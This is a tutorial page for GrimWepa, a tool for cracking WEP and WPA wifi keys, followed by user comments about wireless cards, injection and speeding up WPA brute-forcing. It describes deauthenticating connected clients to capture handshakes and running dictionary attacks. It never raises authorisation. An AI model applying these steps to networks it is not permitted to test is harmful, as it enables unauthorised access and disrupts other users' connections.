|
Tutorial
How-to on GrimWepa
Featured GRIMWEPA TUTORIALStart UpTo run GrimWepa, navigate to the JAR file in the console and type: java -jar grimwepa_X.X.jar (X.X being the version you have). This will load the program and display the GUI within a few seconds. When GrimWepa first loads, it will check if any devices are in Monitor Mode. Monitor mode is a state that some wifi cards can be in so they can collect data packets which are not destined for themselves. This is crucial for receiving data packets to crack WEP and WPA access points. If there are no found devices in monitor mode, GrimWepa will enumerate all possible wifi devices and ask you to select a device to put into Monitor Mode. Once you select a device and press "OK", GrimWepa will put the device into monitor mode using airmon-ng, then add it to the list of Wifi Devices, automatically selecting the device it just put into MM. Once we have a selected wifi device, we can begin to search for targets. SearchClick the "Refresh Targets" button to begin the search for targets. If you want to only search a specific channel, uncheck the "All Channels" option and drag the slider to the channel you want to stay on. After a few seconds (usually around 5), access points should appear in the list. Some people have reported that they get a FileNotFoundException printout in the console. This is usually due to an invalid Wifi Device selection. Note: GrimWepa will display the airodump-ng window (minimized by default) in an XTerm window. You can view the airodump output by maximizing the window. GrimWepa will ONLY ADD WEP AND WPA/WPA2 access points to the list! If you are surrounded by OPEN networks and nothing else, the list will remain empty! After you see your target in the list, click "Stop Refreshing", select your target, and depending on if your target is WPA or WEP, start the attack. AttacksWEP There are 5 kinds of WEP attacks:
It is not necessary to change your MAC address ("Change MAC" button) to crack WEP sucessfully, but some routers may require it. Use Change MAC if other methods are unsucessful. GrimWepa will automatically begin cracking the WEP key after it has collected 10,000 IVs (initialization vectors, or "Data" packets). You can start the cracker prior to this point by clicking Start Cracking. This is not recommended, since the chances of cracking a WEP key prior to 10,000 IVs is low; also, if the key IS cracked right before 10,000 IVs are captured, then GrimWepa MAY ignore the first crack and start the cracking session over (this is a known bug). When GrimWepa (aircrack-ng) has cracked your WEP password, it will display the password in the status bar and also save the key in a text file "wepcracked.txt" in the same directory as the Jar file. WPA We want to crack the WPA access point. To crack it, we need to get the 4-way handshake. To get the 4-way handshake, we need a client to connect to the access point. The Deauthentication attack will try to deauthenticate a client (if one is selected) or the entire access point (if no client is selected). To increase your chances of getting a handshake, get as close as possible to the access point and wait for someone to connect. If there's already a client connected, select their MAC address so GrimWepa will deauthenticate them, forcing them to reconnect, and forcing a handshake to be broadcasted. After a handshake is received, the "Start Cracking" will become enabled. You can type in the location of a password list you would like to use (path) or type the path to a non-existent file ('use_default_damnit') to force GrimWepa to use the default password list. The default password list contains about 250,000 passwords (all over 8 characters in length) that I compiled from many different wordlists. I know that Backtrack 4 has a wordlists folder located at /pentest/passwords/wordlists/ at least one file in there (darkc0de.lst). Good luck! |
► Sign in to add a comment
I already have the 4handeshaek HOW can i import it to program without start over again because the program wouldn't start cracking the handshake without starting over and capture handshake again by they this thanks for great work
-ksa99jed@gmail.com
You can call aircrack-ng by itself if you know where the .cap file is.
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
you have to give it a wordlist to crack.
hope that helps.
my agn 4965 can't inject, 40 min and only 100 datas I'm using p0841 attack. I need help :)
@damaskinoss : If your wireless card can't inject, then all attacks are useless. You NEED a wireless card that supports injection.
Check out the Alfa AWUS036H-V5 wifi card ... it's reasonably cheap, very powerful, and BT4 supports injection.
is it possible to use GrimWepa? with airserv-ng? i mean i have a wgt634u that is running airserv on openwrt kamikaze and i'd like to use it as a wifi card server. thanks
It is not possible to use GrimWepa? with airesrv-ng at this time. I didn't even know about airserv-ng, but I will look into it. Thanks.
I have an Alfa AWUS036H and it tells me i do not have injection support when trying to run a ARP. Cant figure it out. Using drivers that came with BT4.
@xxCarpatia : I've heard that card is very compatible with Backtrack4. Perhaps the access point you are testing injection with won't allow it (Shared Authentication rather than Open). You should try changing the settings on your router and test again.
Hey awesome program. I have a question will a belkin f5d7050 v4xxx work with injection. I keep hearing different things so Im not sure. I hate to be wasting my time tryin to get this to work and find out my card wont inject. I know it does go into monitor mode tho.
@Gangsta.Logs : Not sure if that card is compatible with injection. You can google "backtrack belkin f5d7050" or check out the Backtrack HCL. If you still don't know, try asking your question at the Backtrack 4 forums.
@xxCarpathia Have you put it in monitor mode? Goto a Konsole and type
To find out your interface type:
airmon-ng
then
airmon-ng start YOURINTERFACE
So mine is wlan0 so:
airmon-ng start wlan0
I have that Alfa and it does support injection.
I'm search for one dictionary cracked in wpa ?
good software -But Need TUTORIAL about dictionary to find WPA keys.
Hello, I seem not to be able to get the handshake between my AP and my Cellphone. Cellphone rarely gets disconnected and when it happens and it reconnects, the handshake still isnt taken. How much wait time is advised? I tried with 5secs, 10secs up to 20secs, nothing worked.
can u include cowpatty when i use dics attack , and another idea if i got the handshake and make new scan i lost it the handshake must stay and try to crack it again the program cant hack WEP SKA i try manny time when i use the consol command it work ?? i guess some kind of bugs need to fix thxxxx man for the great tool
a totally amazing little tool.....however, i have a little problem here: my wireless card is Dlink DWA 160A1, when i clicked "Test injection" it tells me "29/30 96%". so it is working, but when i try to crack any WEP-encrypted APs, i can't capture any data or IVs....can someone explain this to me? is it because my wireless card driver? Thanks again for the author's hard work.
@fangzhenyuinca: Your problem is your wireless card driver. Here's an article on Backtrack 4 discussing how to update your drivers properly (the DLINK DWA 160A1 is on the list): http://www.backtrack-linux.org/forums/backtrack-howtos/1042-how-get-ar9170-chipset-usb-adapter-working.html
@seen.bawl: I didn't include cowpatty because I felt that the program had enough options. If you want to see cowpatty included, the source code is available on this site and the project is open source. Feel free to contribute to the project yourself.
I don't get paid to add features (surprise!), so I'm done taking requests for cowpatty/airolib-ng/hashtables.
I wanted to add the ability to crack WEP networks with SKA (Shared Key Authentication). However, I haven't been able to get the WEP SKA attack to work on my router, so I am unable to program it (it's hard to program something you cannot test). If I get a new wireless router that is vulnerable to the WEP SKA attack (doubtful that I would "downgrade"), then I will include that feature in the next version.
I have the Alfa 1000mw (5dbi antenna). Your software (ver 1.10a6) is telling me "Grimwepa is unable to fake-authenticate with the router", and it lists the possible reasons: 1) You are too far from the router, 2) wirelesscard is not powerful enough, 3) wireless chipset does not support injection.
If we consider the high prestige of this card, would you say the reason for not being able to fake-authenticate is that I am too far form the router?
iwconfig is listing the power of my card to 20dbm. Should I increase its power?
Thanks a lot and congrats for such a nice piece of software.
My guess is that you are too far from the router. Then again, this problem isn't so much about grimwepa as it is about you: your operating system, your drivers, your chipset, your wireless device, and aireplay-ng/airodump-ng. I would search aircrack-ng's site for more info (http://www.aircrack-ng.org/doku.php?id=fake_authentication). Once you get fake-authentication working by typing in the commands one-by-one, then you can understand where your problem lies (if you even have one).
Also, the Alfa AWUS036H card is not as 'prestigious' as you may think: http://www.backtrack-linux.org/forums/experts-forum/31277-alfa-awus036h-dissapointment.html
Survey says: Over-hyped.
Also, I'm not updating or fixing grimwepa anymore; you can check out my new project if you like: http://code.google.com/p/wifite/ it's a wep/wpa cracking script written in python. you might have better luck with it.
Is their any way to increase the speed of wpa brute-forcing
@jamilarif55:
Yes, you can speed up brute-forcing:
PYRIT: http://code.google.com/p/pyrit/
Precomputed hash tables: http://wirelessdefence.org/Contents/coWPAttyMain.htm
online WPA password cracker: http://tools.question-defense.com/wpa-password-cracker/ TADA
Pyrit is not working..... give the link of cowpatty video to speed-up bruteforcing
The Aircrack-ng -r (database file) (cap file) step not working in PYRIT...
hats off and a bow to the guy who wrote this program. i paid my dues, doing it the old way,typing out the commands by hand, but this is so much easyer, and fast.i`m using the Alfa AWUS036H with a 9db antenna, iwconfig shows it putting out 27db, occasionally i will get the error like they guy said in earlier post, but i found it was because the AP was just too far away. slect a WEP AP and hit injection test, sometimes it says it failed, but hitting the button again shows a success, ( almost alawys need to hit it more than once) if you get an error saying unable to fake authentication, ignore, click yes to continue, it may take a good 5 minutes or more but eventually the data packets will start climbing like crazy,( i set my injection rate to 1000 ppp max) the ALFA will do 999 ppp no problem, ( lower it to 600 if its a weak AP). i like that the newer version of grim wepa matches client mac to bssid, it was vey confusing in the version that came with BT4. i had some problems capturing any WPA handshake with grim wepa so i attempted it with airodump, and found that the results were the same, ( probably too far away) went back to grim wepa, locked onto AP , drove to the gas station and came back to find it captured a handshake to my supprise. i guess the key to success to patience.
hey i did all of that but i dont have the status bar.. how can i get it??
coment j'adopté gremwepa sous mandriva xtreme2009
hi man how are u tell this moment im useing grimwepa its really very good program can u please back and work on it again its good and stronger and easy to use more than the new secript wifite im wating day after day to see new update for this great tool u done great job and i hope u will work again in grimwepa and make it more stronger than before
thanks alot
hi I use GrIM Wepa in BT5 and i have a view problem with Grim Wepa : so I can't see full view of the GRIMWEPA and i only see upper part
Now fix ?